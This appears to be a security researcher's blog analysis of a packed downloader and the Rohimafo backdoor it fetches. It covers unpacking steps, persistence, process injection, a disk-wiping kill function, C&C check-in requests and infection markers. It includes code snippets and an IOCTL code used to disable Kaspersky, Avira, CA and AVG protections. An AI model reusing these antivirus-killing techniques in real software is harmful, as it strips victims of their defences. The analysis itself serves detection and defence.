Today (despite our DDoSer “friend”) we’re going to analyze a new sample (md5: 2e7ea8b3d9cda626cdd8d6557952245d) that currently is 4/41 on virustotal.

Just two words on the packer:

• it checks if a file named systemroot\system32\drivers\vmscsi.sys exists ( the SCSI driver of VMWare) and if so exits, ExpandEnvironmentStringsA is used to retrieve the path, followed by a call to GetFileAttributes.
• it adds + 2 to the API function address before calling it, I guess to try to avoid simple hooks.

For those who want to unpack it:

• pass invalid instruction and access violations exceptions to program
• break on ExpandEnvironmentStringsA (to skip all the initial garbage)
• if you are on VMWare remember to change the return value of GetFileAttributes
• after that it starts unpacking the original executable, which is scrambled and compressed with HipPack, wait until the second call to LocalFree. After the second one it will start to resolve imports and finally pass control to OEP via ret.

The unpacked executable check if it’s already installed, opening the Atom “Mon Feb 1 07:05:52 2010″, if it’s not install itself into system32, appends its path to “software\microsoft\windows nt\currentversion\winlogon\userinit” and injects a dll into svchost.exe, after a call to RtlAdjustPrivilege.

the dll calls home with the following request:

where A83B2824 is the botid and seller-15 seems to be the malware pusher id ;)

in return you get this:

with some mirrors and a new friend to download and execute.

The new friend (md5: c7de49245194191869346e98448c90b4) is Backdoor.Rohimafo

The major features are:

• tries to kill some AVs (more on this later)
• a nasty !kill_os function that writes gargabe to “\\.\PhysicalDrive” and kills systematically some key OS processes (lsass.exe, smss.exe, csrss.exe, …)
• injects itself into several programs (iexplorer.exe, firefox.exe, opera.exe, javaw.exe, javaws.exe, mnp.exe, isclient.exe, intpro.exe) to intercept network traffic and keystrokes
• opens a socket and dutiful notifies it to C&C with something like this:

  GET /socks.php?name=SYSTEM!COMPUTERNAME!A83B2824&port=10276

• it has the ability to add fake network routes to block communications to a predefined list of ips
• it sends back all the data collected via a POST to /gate.php to the C&C

some infection markers are a mutex named “{3097C089-C4F6-44a2-ADE2-83B4DE141A2A}” and as for the network signatures (beside the urls) this: “——7d737a16804a6″ used in the multipart encoding when it send back the collected data via a POST request.

As i said it tries to kill 4 different antivirus software, I didn’t had time to confirm if they work or not, here they are:

1. The first searches for a window with it’s name set to “____AVP.Root” and then
   sends a message (466h) to it. this seems targetted to kill KIS, if you search that string
   on google you’ll land on several .cn blogs with this snippet:

   kisHand:=FindWindow('____AVP.Root',nil);
   PostMessage(kisHand,WM_USER+102,1,1);

2. Another one is targetted for Avira AV, it uses two functions from avipc.dll AvIpcCall and AvIpcConnect in this way:

   AvIpcConnect("avguard01", 5000);
   AvIpcCall(avh, 0x2D, avmsg, 0xC, 0, 0, &out, 0);

3. now it’s the turn of CA HIPS component (KmxAgent.sys) what it does is opening “\\.\KmxAgent” and sending an IOCTL (code: 86000054h) with a buffer.
4. Last one is AVG, it simply goes by bruteforce overwriting avgtdix.sys with garbage and terminating avgtray.exe

*I’m not including the specific buffers used for the attacks, if you are interested contact me directly

All the hosts (C&C) involved with these two malware samples are connected to the following well-known persons: